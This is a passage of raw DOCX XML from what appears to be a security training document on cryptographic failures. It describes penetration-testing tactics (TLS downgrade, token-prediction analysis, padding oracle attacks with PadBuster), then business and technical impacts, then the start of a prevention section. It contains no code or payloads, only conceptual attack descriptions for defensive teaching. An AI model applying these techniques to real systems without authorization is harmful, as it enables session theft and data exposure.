      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5EAB8" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Reusing a static, constant Initialization Vector (IV) across multiple encryption operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9A598D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Penetration Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6A65B8"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Penetration testers validate the exploitability of cryptographic weaknesses by intercepting traffic, analyzing predictable token spaces, and manipulating ciphertext inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CD021B"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1. Transport Layer Inspections &amp; Downgrade Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD6C3D7"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Testers assess whether an application strictly enforces communication privacy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7323D6A9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>testssl.sh</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or Burp Suite, a tester evaluates the server's TLS configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EEFD24" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactics:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attempting a </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>TLS Downgrade Attack</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> by forcing the client and server to negotiate an obsolete protocol version (e.g., TLS 1.0) or an export-grade cipher suite. If successful, the tester can passively sniff network traffic or execute a Man-in-the-Middle (MitM) attack to steal session tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B722FB6"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2. Cryptographic Randomness Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D2698"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Testers evaluate whether unique values (like session tokens, CSRF tokens, or password reset strings) can be anticipated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DE6803" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The tester harvests thousands of sequential or concurrently generated tokens from the target application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20493048" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactics:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The collected tokens are passed through statistical analysis tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Burp Suite Sequencer</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . The tool measures the entropy (randomness) of the sample set. If the tokens exhibit low character variance or show mathematical </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>correlations indicating they are tied to a linear congruential generator or system timestamp, the tester can script a script to predict future valid tokens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDF0EE"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3. Ciphertext Manipulation &amp; Padding Oracle Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A0ABD6"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When applications utilize CBC mode encryption without verifying message integrity, testers attempt to decipher text block-by-block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BECEE43" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacking endpoints that accept encrypted inputs (e.g., an encrypted session cookie like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>UID=7a9f...</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D38B0" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tactics:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> The tester uses tools like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>PadBuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or manual scripts to alter the final bytes of a ciphertext block and submits it to the server. If the application returns distinct errors for an invalid padding structure versus an invalid decrypted payload value, the server acts as an "oracle."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF48231"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By systematically iterating through byte adjustments and observing these responses, the tester can decrypt the entire ciphertext or forge valid encrypted payloads without ever knowing the master encryption key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38336BDE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Impact Assessment (Damages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BDE3DD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Technical Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB6250"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When cryptographic controls fail, the underlying security guarantees of an application— Confidentiality, Integrity, and Authenticity—completely erode. The technical consequences to the system and its data include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D57666A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Complete Loss of Data Confidentiality:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unencrypted or weakly encrypted data stored at rest (databases, backups, file systems) or transmitted over the network can be read directly by unauthorized actors. Sensitive data such as plain-text passwords, personally identifiable information (PII), and financial records are exposed entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D00B1B1" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Widespread Privilege Escalation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If session tokens, JSON Web Tokens (JWTs), or administrative cookies rely on predictable random number generators or broken encryption algorithms, an attacker can forge valid administrative tokens. This allows them to bypass authentication completely and assume the highest level of system privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EADD48D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Data Manipulation and Lack of Integrity:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without authenticated encryption (e.g., using AES-GCM or paired HMACs), attackers can alter intercepted ciphertext in transit or manipulate encrypted data at rest. By executing bit-flipping or padding oracle attacks, they can force the system to process modified data, leading to data corruption or unauthorized state changes (e.g., changing a transaction recipient or modifying an account balance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC00BCC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="109"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mass Credential Cracking:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a backend database is compromised and user passwords are protected by legacy or fast hashing algorithms (like MD5, SHA1, or unsalted SHA256), attackers can leverage offline commodity GPU arrays or rainbow tables to crack the passwords of the entire user base at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B918480" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Business Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2894F1DA"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The business fallout from a cryptographic failure is rarely contained to an IT department; it frequently compromises the viability of the entire enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750EF961" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Severe Regulatory Non-Compliance &amp; Fines:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cryptographic failures almost always result in the exposure of protected data. This triggers catastrophic non-compliance penalties under frameworks like the </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>EU's GDPR</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (fines up to 4% of global annual turnover), </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>HIPAA</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for healthcare data, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>PCI DSS</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> for payment card processing, which can strip an organization of its ability to process credit cards entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A81FF7D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Erosion of Customer Trust &amp; Brand Reputational Damage:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> News of exposed customer data, plain-text passwords, or intercepted financial transactions permanently damages a company’s market reputation. Customers rapidly migrate to competitors, and the cost of public relations damage control, customer notification mandates, and mandated identity theft monitoring services can be astronomical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483344FD" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Massive Financial Liabilities &amp; Litigation:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Organizations face expensive class-action lawsuits from affected users, partners, and shareholders for failing to exercise a reasonable standard of due care regarding data protection. Additionally, forensic investigation costs, incident response retainers, and the overhead required to re-architect the broken cryptographic infrastructure drain corporate capital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA6AEF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intellectual Property Theft &amp; Competitive Disadvantage:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cryptographic failures don't just expose customer data; they can expose proprietary business secrets, trade algorithms, source code repositories, and strategic corporate roadmaps. If an attacker intercepts or extracts these assets, the company loses its core competitive advantage in the marketplace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49154889" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Prevention (Building it Right)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508C9765" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Secure Coding Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C98DF8C"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Eliminating cryptographic failures requires shifting away from custom or legacy implementations and adopting industry-standard, well-vetted libraries and native language primitives from the very first line of code.</w:t>
      </w:r>
    </w:p>
